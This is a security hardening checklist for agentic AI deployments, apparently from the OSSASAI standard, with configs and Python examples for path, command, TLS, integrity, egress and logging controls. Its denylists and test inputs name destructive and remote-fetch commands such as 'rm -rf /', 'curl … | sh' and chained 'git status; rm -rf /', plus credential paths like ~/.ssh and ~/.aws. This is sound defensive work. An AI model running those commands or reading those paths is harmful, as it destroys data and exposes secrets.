Overview

This checklist provides comprehensive security hardening steps beyond the minimum control requirements. Use this to strengthen your security posture after achieving baseline compliance.

Pre-Deployment Checklist

Environment Preparation

  • Create dedicated service account (non-root)
  • Configure restrictive umask (077)
  • Set up isolated filesystem paths
  • Generate TLS certificates
  • Configure firewall rules
  • Enable SELinux/AppArmor

Configuration Security

  • Remove default credentials
  • Generate unique API keys
  • Configure secure defaults
  • Disable unnecessary features
  • Enable audit logging
  • Configure log rotation

L1 Hardening Checklist

Authentication Hardening

# Verify authentication settings
[ ] Authentication required for all operations
[ ] Root execution blocked
[ ] System accounts blocked
[ ] Session timeout configured

Configuration:

authentication:
  required: true
  session_timeout_minutes: 60
  max_failed_attempts: 5
  lockout_minutes: 15

Filesystem Hardening

# Filesystem security checks
[ ] Working directory scope enforced
[ ] Symlink following disabled
[ ] Sensitive patterns blocked
[ ] Path traversal prevented

Configuration:

filesystem:
  scope: "workdir"
  follow_symlinks: false
  canonicalize_paths: true
  denied:
    - "**/.env*"
    - "**/*.key"
    - "**/*.pem"
    - "**/secrets/**"
    - "~/.ssh/**"
    - "~/.aws/**"
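
The four filesystem checks above can be enforced in one function: refuse symlinks before resolving, canonicalise, compare the real location against the working directory, then apply the denied globs. The following is an added example written in Python (the page does not prescribe a language) and is not OSSASAI project code; the policy keys mirror the YAML above, while check_path, glob_to_regex and the temporary workspace that demo() builds are assumptions made here for illustration.

```python
"""Path policy enforcement modelled on the filesystem config above.

Added example, not OSSASAI project code. The policy keys follow the YAML
above; check_path, glob_to_regex and the workspace built by demo() are
assumptions made for illustration.
"""
import os
import re
import tempfile

POLICY = {  # same shape as the filesystem: block above
    "scope": "workdir",
    "follow_symlinks": False,
    "canonicalize_paths": True,
    "denied": ["**/.env*", "**/*.key", "**/*.pem", "**/secrets/**",
               "~/.ssh/**", "~/.aws/**"],
}


def glob_to_regex(pattern: str) -> "re.Pattern[str]":
    """Translate a gitignore-style glob into a regex anchored on the full path.

    '**' spans directory separators, '*' and '?' do not, and a leading '~'
    is expanded so '~/.ssh/**' matches the absolute path under $HOME.
    """
    pattern = os.path.expanduser(pattern)
    out, i = "", 0
    while i < len(pattern):
        if pattern.startswith("**/", i):
            out, i = out + "(?:.*/)?", i + 3
        elif pattern.startswith("**", i):
            out, i = out + ".*", i + 2
        elif pattern[i] == "*":
            out, i = out + "[^/]*", i + 1
        elif pattern[i] == "?":
            out, i = out + "[^/]", i + 1
        else:
            out, i = out + re.escape(pattern[i]), i + 1
    return re.compile("^" + out + "$")


def _symlink_below(path: str, workdir: str) -> bool:
    """True if any component of path between workdir and the leaf is a symlink.

    Checked on the *unresolved* path with lstat semantics, so the link itself
    is caught before realpath() would silently follow it.
    """
    cur = path
    while cur.startswith(workdir + os.sep):
        if os.path.islink(cur):
            return True
        cur = os.path.dirname(cur)
    return False


def check_path(workdir: str, requested: str, policy: dict = POLICY) -> str:
    """Return 'allow' or 'deny:<reason>' for one file access request."""
    workdir = os.path.realpath(workdir)
    raw = requested if os.path.isabs(requested) else os.path.join(workdir, requested)
    raw = os.path.normpath(raw)

    if not policy["follow_symlinks"] and _symlink_below(raw, workdir):
        return "deny:symlink"

    # Canonicalise before the scope check so '..' and link targets are
    # resolved and the comparison is made on the real location.
    resolved = os.path.realpath(raw) if policy["canonicalize_paths"] else raw
    if os.path.commonpath([workdir, resolved]) != workdir:
        return "deny:outside-workdir"

    for pattern in policy["denied"]:
        if glob_to_regex(pattern).match(resolved):
            return f"deny:pattern:{pattern}"
    return "allow"


def demo() -> dict:
    """Build a throwaway workspace (constructed data) and evaluate requests."""
    base = tempfile.mkdtemp(prefix="ossasai-fs-")
    ws = os.path.join(base, "ws")
    for rel in ("src/app.py", ".env", "config/app.key", "secrets/db.txt"):
        full = os.path.join(ws, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("constructed sample\n")
    outside = os.path.join(base, "outside.txt")
    open(outside, "w").close()
    os.symlink(outside, os.path.join(ws, "link_out"))  # escape attempt via symlink

    requests = ["src/app.py", "src/../src/app.py", ".env", "config/app.key",
                "secrets/db.txt", "link_out", "../outside.txt", "/etc/passwd"]
    return {r: check_path(ws, r) for r in requests}


if __name__ == "__main__":
    for req, verdict in demo().items():
        print(f"{verdict:32} {req}")
```

The symlink test runs on the unresolved path on purpose: once realpath() has followed the link the request looks like an out-of-scope absolute path and the reason reported to the operator is misleading.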

Command Hardening

# Command execution checks
[ ] Allowlist mode enabled
[ ] Dangerous commands blocked
[ ] Shell metacharacters blocked
[ ] User approval required

Configuration:

commands:
  mode: "allowlist"
  require_approval: true
  shell: false  # Never use shell=True
  denylist:
    - "rm -rf /"
    - "sudo *"
    - "curl * | *sh"
    - "chmod 777 *"

The denylist is defense in depth only. String patterns are trivially sidestepped: "rm -fr /", "rm -rf /*" and "/bin/rm -rf /" match none of the entries above. The controls that actually hold are allowlist mode, user approval, and shell: false, which hands the command to the OS as an argv array so that ";", "|" and "$(...)" are never interpreted by a shell.
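
The following added example, written in Python and not OSSASAI project code, evaluates commands against the policy above and executes approved ones as an argv array. The allow list, the classify and run_if_allowed functions, the approver callback and the sample commands are assumptions made here; the denylist entries are the ones from the configuration.

```python
"""Command policy evaluation modelled on the commands config above.

Added example, not OSSASAI project code. POLICY mirrors the YAML above plus
an 'allow' list (assumed here, since allowlist mode needs one); classify(),
run_if_allowed() and the approver callback are illustrative names.
"""
import fnmatch
import re
import shlex
import subprocess
from typing import Callable, List

POLICY = {
    "mode": "allowlist",
    "require_approval": True,
    "shell": False,                      # argv execution only, never shell=True
    "allow": ["git", "ls", "echo"],      # assumed allowlist for the demo
    "denylist": ["rm -rf /", "sudo *", "curl * | *sh", "chmod 777 *"],
}

# Characters that only mean something to a shell. We never invoke one, so
# they would be passed literally, but an agent emitting them is a strong
# signal of an injection attempt and the request is refused outright.
SHELL_META = re.compile(r"[;&|<>`$(){}\\\n]")


def classify(command: str, policy: dict = POLICY) -> str:
    """Return 'allow' or 'deny:<reason>' for a command string."""
    for pattern in policy["denylist"]:          # cheap, but easy to sidestep
        if fnmatch.fnmatchcase(command, pattern):
            return f"deny:denylist:{pattern}"
    try:
        argv = shlex.split(command)
    except ValueError as exc:                   # unbalanced quotes etc.
        return f"deny:unparsable:{exc}"
    if not argv:
        return "deny:empty"
    if any(SHELL_META.search(tok) for tok in argv):
        return "deny:shell-metacharacter"
    # The allowlist is the control that holds: argv[0] must be an exact
    # allowed name, so '/bin/rm' and 'rm -fr /' are refused even though no
    # denylist entry matches them.
    if policy["mode"] == "allowlist" and argv[0] not in policy["allow"]:
        return f"deny:not-allowlisted:{argv[0]}"
    return "allow"


def run_if_allowed(command: str, policy: dict = POLICY,
                   approver: Callable[[List[str]], bool] = lambda argv: False) -> str:
    """Execute as an argv array (no shell) only if policy and the approver agree."""
    if policy.get("shell"):
        raise PermissionError("deny:shell-mode-forbidden")
    verdict = classify(command, policy)
    if verdict != "allow":
        raise PermissionError(verdict)
    argv = shlex.split(command)
    if policy["require_approval"] and not approver(argv):
        raise PermissionError("deny:not-approved")
    done = subprocess.run(argv, shell=False, capture_output=True, text=True,
                          timeout=30, check=False)
    return done.stdout


def demo() -> dict:
    """Classify a set of constructed agent-issued commands."""
    samples = ["ls -la", "rm -rf /", "rm -fr /", "/bin/rm -rf /", "sudo ls",
               "git status; rm -rf /", "curl https://example.com/x.sh | sh",
               "echo $HOME", 'echo "unterminated']
    return {s: classify(s) for s in samples}


if __name__ == "__main__":
    for cmd, verdict in demo().items():
        print(f"{verdict:40} {cmd}")
    print(run_if_allowed("echo hello", approver=lambda argv: True), end="")
```

Note that "rm -fr /" is stopped by the allowlist, not the denylist, and that the approver defaults to refusing everything: an approval hook that is accidentally left unwired must fail closed.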

Sensitive Data Protection

# Sensitive data checks
[ ] Credential patterns detected and blocked
[ ] Private key patterns detected and blocked
[ ] Output redaction enabled
[ ] Logging excludes sensitive data

L2 Hardening Checklist

Network Hardening

# Network security checks
[ ] TLS 1.2+ required
[ ] Weak ciphers disabled
[ ] Certificate validation enabled
[ ] HTTP automatically upgraded to HTTPS

Configuration:

network:
  tls:
    required: true
    min_version: "TLS1.2"
    ciphers:
      - "TLS_AES_256_GCM_SHA384"
      - "TLS_AES_128_GCM_SHA256"
    deny:
      - "*CBC*"
      - "*RC4*"
      - "*3DES*"

The two suites listed are TLS 1.3 suites, which OpenSSL-based stacks enable regardless of the cipher string. With min_version TLS1.2 you must also allow the TLS 1.2 ECDHE AEAD suites (ECDHE-ECDSA-AES256-GCM-SHA384, ECDHE-RSA-AES128-GCM-SHA256 and the CHACHA20-POLY1305 variants), or a TLS 1.2 peer has nothing to negotiate. Check the deny patterns against the names your library actually reports: OpenSSL calls 3DES "DES-CBC3-SHA", which "*3DES*" never matches but "*CBC*" does.
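
The following added example (Python's standard ssl module, not OSSASAI project code) builds a client context that satisfies the four network checks and audits it against the deny patterns, including the 3DES naming mismatch. The function names, the cipher string and the insecure comparison context are assumptions made here.

```python
"""Client-side TLS context matching the network config above.

Added example, not OSSASAI project code; uses only Python's ssl module.
build_client_context, verify_context, upgrade_url and the cipher string
are names and choices made here.
"""
import fnmatch
import ssl
from typing import Dict, List

_MIN_VERSIONS = {"TLS1.2": ssl.TLSVersion.TLSv1_2, "TLS1.3": ssl.TLSVersion.TLSv1_3}

# TLS 1.2 AEAD suites with forward secrecy. TLS 1.3 suites such as
# TLS_AES_256_GCM_SHA384 are not selected through this string; OpenSSL
# enables them on its own whenever TLS 1.3 is allowed.
TLS12_CIPHER_STRING = "ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL:!MD5"


def build_client_context(min_version: str = "TLS1.2") -> ssl.SSLContext:
    """Context that validates certificate and hostname and refuses < min_version."""
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)  # CERT_REQUIRED + hostname check
    ctx.minimum_version = _MIN_VERSIONS[min_version]
    ctx.set_ciphers(TLS12_CIPHER_STRING)
    return ctx


def insecure_context_for_comparison() -> ssl.SSLContext:
    """What 'verify=False' style code produces: no certificate validation at all."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def verify_context(ctx: ssl.SSLContext, deny: List[str]) -> Dict[str, object]:
    """Audit a context against the checklist; returns findings instead of asserting."""
    # OpenSSL names 3DES suites 'DES-CBC3-...', so translate the glob first.
    globs = [g.replace("3DES", "DES-CBC3") for g in deny]
    names = [c["name"] for c in ctx.get_ciphers()]
    weak = [n for n in names if any(fnmatch.fnmatchcase(n, g) for g in globs)]
    return {
        "min_version_ok": ctx.minimum_version >= ssl.TLSVersion.TLSv1_2,
        "cert_validation": ctx.verify_mode == ssl.CERT_REQUIRED and ctx.check_hostname,
        "suite_count": len(names),
        "weak_suites": weak,
    }


def upgrade_url(url: str) -> str:
    """Rewrite plain http:// URLs to https://; other schemes are left alone."""
    if url.lower().startswith("http://"):
        return "https://" + url[len("http://"):]
    return url


if __name__ == "__main__":
    deny = ["*CBC*", "*RC4*", "*3DES*"]
    print("hardened:", verify_context(build_client_context("TLS1.2"), deny))
    print("insecure:", verify_context(insecure_context_for_comparison(), deny))
    print(upgrade_url("http://example.com/api"))
```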

Session Hardening

# Session security checks
[ ] Session isolation enabled
[ ] Per-session storage configured
[ ] Session encryption enabled
[ ] Secure session cleanup configured

Configuration:

sessions:
  isolation:
    enabled: true
    level: "strict"
  storage:
    per_session: true
    encryption:
      enabled: true
      algorithm: "AES-256-GCM"
  cleanup:
    on_end: true
    secure_delete: true

API Hardening

# API security checks
[ ] Authentication required
[ ] Rate limiting enabled
[ ] Input validation configured
[ ] Security headers enabled

Configuration:

api:
  authentication:
    required: true
  rate_limiting:
    enabled: true
    requests_per_minute: 60
  input:
    max_size_mb: 10
  headers:
    X-Content-Type-Options: "nosniff"
    X-Frame-Options: "DENY"
    Strict-Transport-Security: "max-age=31536000"

Supply Chain Hardening

# Supply chain checks
[ ] Plugin verification enabled
[ ] Lockfiles required
[ ] Dependency scanning enabled
[ ] Vulnerability threshold set

Configuration:

plugins:
  verification:
    enabled: true
    require_signature: true

dependencies:
  require_lockfile: true
  verify_hashes: true
  vulnerability_scan:
    enabled: true
    fail_on: "high"

Resource Hardening

# Resource limit checks
[ ] CPU limits configured
[ ] Memory limits configured
[ ] Disk limits configured
[ ] Operation timeouts configured

L3 Hardening Checklist

Integrity Hardening

# Configuration integrity checks
[ ] Tamper detection enabled
[ ] Baseline created
[ ] Continuous monitoring enabled
[ ] Alerts configured
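
Tamper detection with a baseline is a manifest of file digests protected by a MAC whose key is not on the monitored host. The following added example (Python, not OSSASAI project code) creates such a baseline, reports modified, added and removed files, and shows that an attacker who rewrites the baseline to match their changes still cannot forge the MAC. The baseline format, the demo key and the files it builds are assumptions made here.

```python
"""Configuration tamper detection for the integrity checks above.

Added example, not OSSASAI project code. The baseline layout, the HMAC key
handling and the file set built by demo() are choices made here.
"""
import hashlib
import hmac
import json
import os
import tempfile
from typing import Dict


def file_sha256(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _manifest(root: str) -> Dict[str, str]:
    """Relative path -> sha256 for every regular file below root, sorted."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and not os.path.islink(full):
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                files[rel] = file_sha256(full)
    return dict(sorted(files.items()))


def _mac(files: Dict[str, str], key: bytes) -> str:
    canonical = json.dumps(files, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canonical, "sha256").hexdigest()


def create_baseline(root: str, key: bytes) -> dict:
    """Snapshot root. Keep the key off-host (KMS, HSM or the monitoring
    system): a baseline stored beside the config is only as trustworthy
    as the key that protects it."""
    files = _manifest(root)
    return {"files": files, "mac": _mac(files, key)}


def verify_baseline(root: str, baseline: dict, key: bytes) -> dict:
    """Compare the live tree with the baseline and report every difference."""
    expected = baseline["files"]
    manifest_ok = hmac.compare_digest(_mac(expected, key), baseline["mac"])
    current = _manifest(root)
    return {
        "manifest_ok": manifest_ok,
        "modified": sorted(p for p in expected if p in current and current[p] != expected[p]),
        "added": sorted(p for p in current if p not in expected),
        "removed": sorted(p for p in expected if p not in current),
    }


def _write(path: str, body: str) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(body)


def demo() -> dict:
    """Constructed config tree, then a simulated tampering and a forged baseline."""
    key = b"demo-key-keep-this-off-host"          # constructed; use a KMS-held key
    root = tempfile.mkdtemp(prefix="ossasai-int-")
    _write(os.path.join(root, "config.yaml"), "authentication:\n  required: true\n")
    _write(os.path.join(root, "policy/commands.yaml"), "mode: allowlist\n")
    baseline = create_baseline(root, key)
    clean = verify_baseline(root, baseline, key)

    # Attacker weakens a control, drops in a new policy file, deletes another.
    _write(os.path.join(root, "config.yaml"), "authentication:\n  required: false\n")
    _write(os.path.join(root, "policy/extra.yaml"), "mode: permissive\n")
    os.remove(os.path.join(root, "policy/commands.yaml"))
    tampered = verify_baseline(root, baseline, key)

    # Attacker also rewrites the manifest to match, but cannot recompute the MAC.
    forged = {"files": _manifest(root), "mac": baseline["mac"]}
    return {"clean": clean, "tampered": tampered, "forged": verify_baseline(root, forged, key)}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```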

Formal Verification Hardening

# Formal verification checks
[ ] Security invariants defined
[ ] Continuous invariant checking enabled
[ ] Policy validation enabled
[ ] Bypass tests implemented

Monitoring Hardening

# Network monitoring checks
[ ] Destination tracking enabled
[ ] Volume monitoring enabled
[ ] Exfiltration detection enabled
[ ] SIEM integration configured
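
Destination tracking, volume monitoring and exfiltration alerts can be produced by a single pass over the egress records. The following added example (Python, not OSSASAI project code) runs that detection over constructed connection-log lines and emits the alerts as JSON lines for a SIEM shipper. The log format (timestamp, agent, destination, bytes out), the known-destination set, the per-hour limit and the alert layout are all assumptions made here; 203.0.113.7 is a documentation-range address.

```python
"""Egress monitoring over constructed connection-log lines, for the network
monitoring checks above.

Added example, not OSSASAI project code. The log format, the known
destination set, the hourly volume limit and the alert layout are
assumptions made here.
"""
import json
from collections import defaultdict
from typing import Dict, List, Tuple

KNOWN_DESTINATIONS = {"llm.api.example", "pypi.org"}   # assumed egress allowlist
BYTES_PER_HOUR_LIMIT = 10 * 1024 * 1024               # 10 MiB per agent/destination/hour

# Constructed sample: timestamp agent destination bytes_out
SAMPLE_LOG = """\
2025-01-10T10:00:01Z agent-1 llm.api.example 4096
2025-01-10T10:00:05Z agent-1 llm.api.example 2048
2025-01-10T10:01:10Z agent-1 pypi.org 1024
2025-01-10T10:02:00Z agent-1 203.0.113.7 8388608
2025-01-10T10:02:30Z agent-1 203.0.113.7 8388608
2025-01-10T10:03:00Z agent-1 paste.example 512
this line is not a connection record
"""


def parse(log: str) -> Tuple[List[dict], int]:
    """Return (records, malformed_line_count); malformed lines are skipped, not guessed at."""
    records, malformed = [], 0
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[3].isdigit():
            malformed += 1
            continue
        records.append({"ts": parts[0], "agent": parts[1],
                        "destination": parts[2], "bytes": int(parts[3])})
    return records, malformed


def detect(records: List[dict]) -> List[dict]:
    """Stream the records once; alert on new destinations and on hourly volume."""
    alerts: List[dict] = []
    seen, flagged = set(), set()
    totals: Dict[tuple, int] = defaultdict(int)
    for r in records:
        key = (r["agent"], r["destination"])
        if r["destination"] not in KNOWN_DESTINATIONS and key not in seen:
            seen.add(key)
            alerts.append({"kind": "unknown_destination", "agent": r["agent"],
                           "destination": r["destination"], "first_seen": r["ts"]})
        hour = r["ts"][:13]                       # YYYY-MM-DDTHH bucket
        bucket = key + (hour,)
        totals[bucket] += r["bytes"]
        if totals[bucket] > BYTES_PER_HOUR_LIMIT and bucket not in flagged:
            flagged.add(bucket)                   # one alert per bucket, not per packet
            alerts.append({"kind": "volume_threshold", "agent": r["agent"],
                           "destination": r["destination"], "hour": hour,
                           "bytes": totals[bucket]})
    return alerts


def to_siem_lines(alerts: List[dict]) -> List[str]:
    """One JSON object per line with stable key order, ready for a log shipper."""
    return [json.dumps(a, sort_keys=True) for a in alerts]


if __name__ == "__main__":
    records, bad = parse(SAMPLE_LOG)
    for line in to_siem_lines(detect(records)):
        print(line)
    print(f"skipped {bad} malformed line(s)")
```

The sample produces three alerts: the unknown address on first contact, the same address again once its hourly total passes the limit, and the unknown paste host. Counting malformed lines separately matters because an attacker who can corrupt the log format would otherwise silence the monitor.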

Logging Hardening

# Audit logging checks
[ ] Comprehensive logging enabled
[ ] Log integrity protection enabled
[ ] Centralized logging configured
[ ] Long-term retention configured
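
Log integrity protection means that editing, deleting or reordering a record is detectable. The following added example (Python, not OSSASAI project code) is a hash-chained, MACed audit log: each record's MAC covers the previous record's MAC, and the latest MAC is periodically shipped to the central collector as an anchor, because the chain alone cannot reveal that its tail was cut off. The record layout, the key and the events are assumptions made here.

```python
"""Tamper-evident audit log for the log integrity check above.

Added example, not OSSASAI project code. The record layout (seq, prev, mac)
and the off-host anchor are choices made here.
"""
import copy
import hmac
import json
from typing import List, Optional, Tuple

GENESIS = "0" * 64


def _canonical(seq: int, prev: str, event: dict) -> bytes:
    return json.dumps({"seq": seq, "prev": prev, "event": event},
                      sort_keys=True, separators=(",", ":")).encode()


def _mac(key: bytes, seq: int, prev: str, event: dict) -> str:
    return hmac.new(key, _canonical(seq, prev, event), "sha256").hexdigest()


class AuditLog:
    """Append-only log in which every record's MAC covers the previous MAC."""

    def __init__(self, key: bytes):
        self._key = key
        self.entries: List[dict] = []

    def head(self) -> str:
        """Latest MAC; ship this to the collector as the anchor."""
        return self.entries[-1]["mac"] if self.entries else GENESIS

    def append(self, event: dict) -> dict:
        seq, prev = len(self.entries), self.head()
        entry = {"seq": seq, "prev": prev, "event": event,
                 "mac": _mac(self._key, seq, prev, event)}
        self.entries.append(entry)
        return entry


def verify_chain(entries: List[dict], key: bytes,
                 anchor: Optional[str] = None) -> Tuple[bool, Optional[int]]:
    """Walk the chain; return (ok, seq of the first bad record).

    Tail truncation is only detectable against an anchor (the last MAC that
    reached the collector), which is why head() must be exported regularly.
    """
    prev = GENESIS
    for i, e in enumerate(entries):
        expected = _mac(key, e["seq"], e["prev"], e["event"])
        if e["seq"] != i or e["prev"] != prev or not hmac.compare_digest(expected, e["mac"]):
            return False, e["seq"]
        prev = e["mac"]
    if anchor is not None and prev != anchor:
        return False, len(entries)
    return True, None


def demo() -> dict:
    """Constructed events, then four tampering scenarios."""
    key = b"audit-mac-key-held-by-log-collector"    # constructed
    log = AuditLog(key)
    for ev in ({"actor": "agent-7", "action": "read", "path": "src/app.py"},
               {"actor": "agent-7", "action": "exec", "argv": ["git", "status"]},
               {"actor": "agent-7", "action": "deny", "reason": "deny:symlink"}):
        log.append(ev)
    anchor = log.head()

    edited = copy.deepcopy(log.entries)
    edited[1]["event"]["argv"] = ["git", "push"]     # rewrite history
    deleted = copy.deepcopy(log.entries)
    del deleted[1]                                   # drop an inconvenient record
    truncated = log.entries[:-1]                     # cut off the tail
    return {
        "intact": verify_chain(log.entries, key, anchor),
        "edited": verify_chain(edited, key, anchor),
        "deleted": verify_chain(deleted, key, anchor),
        "truncated_no_anchor": verify_chain(truncated, key),
        "truncated_with_anchor": verify_chain(truncated, key, anchor),
    }


if __name__ == "__main__":
    for scenario, result in demo().items():
        print(f"{scenario:22} ok={result[0]} first_bad_seq={result[1]}")
```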

Infrastructure Hardening

Operating System

# OS hardening
[ ] Latest security patches applied
[ ] Unnecessary services disabled
[ ] Firewall configured
[ ] SELinux/AppArmor enabled
[ ] Automatic updates enabled
[ ] SSH hardened

SSH Hardening:

# /etc/ssh/sshd_config
PermitRootLogin no
PasswordAuthentication no
# Also close the PAM keyboard-interactive path, or password logins can still
# succeed (older OpenSSH spells this ChallengeResponseAuthentication)
KbdInteractiveAuthentication no
PubkeyAuthentication yes
AllowUsers ocsas-admin
MaxAuthTries 3

Container Hardening

# Container security
[ ] Non-root user
[ ] Read-only root filesystem
[ ] No privileged mode
[ ] Capabilities dropped
[ ] Seccomp profile applied
[ ] Resource limits set

Dockerfile Best Practices:

# Pin a specific base image tag (pinning by digest is stronger still)
FROM ubuntu:22.04

# Create a non-root system user with a fixed UID and no home directory
RUN useradd --system --uid 1000 --no-create-home ocsas
USER ocsas

# Drop capabilities, set a read-only root filesystem and resource limits
# in docker-compose or Kubernetes (see the Pod spec below)

Kubernetes Hardening

# Pod Security Standards, restricted profile (PodSecurityPolicy was removed in Kubernetes 1.25)
apiVersion: v1
kind: Pod
metadata:
  name: ocsas
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 1000
    fsGroup: 1000
    seccompProfile:
      type: RuntimeDefault
  containers:
    - name: ocsas
      securityContext:
        allowPrivilegeEscalation: false
        capabilities:
          drop: ["ALL"]
        readOnlyRootFilesystem: true

Verification Commands

Quick Security Check

#!/bin/bash
# quick-security-check.sh
# Cross-platform security quick check script

echo "=== OSSASAI Security Quick Check ==="

CONFIG_FILE="/etc/ossasai/config.yaml"

# Print a file's permission bits in octal (e.g. 600); non-zero exit if stat fails
get_perms() {
    local file="$1"
    if [[ "$(uname -s)" == "Darwin" ]]; then
        stat -f "%Lp" "$file" 2>/dev/null
    else
        stat -c "%a" "$file" 2>/dev/null
    fi
}

# True if "<key>: true" appears within the lines following "<section>:".
# The keys are nested on separate lines, so a single-line grep such as
# "tls.*required.*true" never matches the YAML shown on this page.
# (Heuristic only; a real audit should parse the YAML, e.g. with yq.)
yaml_flag_true() {
    local section="$1" key="$2"
    grep -A5 -E "^[[:space:]]*${section}:" "$CONFIG_FILE" 2>/dev/null \
        | grep -qE "^[[:space:]]*${key}:[[:space:]]*true"
}

# Check running user
echo -n "Running as non-root: "
[ "$(id -u)" -ne 0 ] && echo "PASS" || echo "FAIL"

# Check file permissions: no group or other bits may be set.
# A numeric test such as "$perms -le 600" is wrong: it passes a
# world-readable 444 and fails a harmless 700.
echo -n "Config file permissions: "
if [ -f "$CONFIG_FILE" ]; then
    if perms=$(get_perms "$CONFIG_FILE") && [ -n "$perms" ]; then
        [ $(( 8#$perms & 077 )) -eq 0 ] && echo "PASS ($perms)" || echo "FAIL ($perms)"
    else
        echo "FAIL (stat failed)"
    fi
else
    echo "SKIP (file not found)"
fi

# Check TLS
echo -n "TLS required: "
{ yaml_flag_true tls required || yaml_flag_true tls enabled; } && echo "PASS" || echo "FAIL"

# Check authentication
echo -n "Authentication required: "
yaml_flag_true authentication required && echo "PASS" || echo "FAIL"

# Run full audit
echo ""
echo "=== Running Full Audit ==="
./ossasai-audit.sh --level L2

Comprehensive Audit

# Run comprehensive security audit
./ossasai-audit.sh --level L3 --verbose --output report.json

# Check specific areas
./ossasai-audit.sh --category network
./ossasai-audit.sh --category filesystem
./ossasai-audit.sh --category authentication

Post-Deployment Checklist

Ongoing Maintenance

  • Schedule regular security audits
  • Monitor security alerts
  • Review access logs weekly
  • Update dependencies monthly
  • Rotate credentials quarterly
  • Conduct penetration tests annually

Incident Preparation

  • Document incident response procedures
  • Configure alerting channels
  • Test backup and recovery
  • Establish communication plan
  • Train team on procedures

OSSASAI v0.2.0 - Open Security Standard for Agentic Systems. Apache 2.0 License.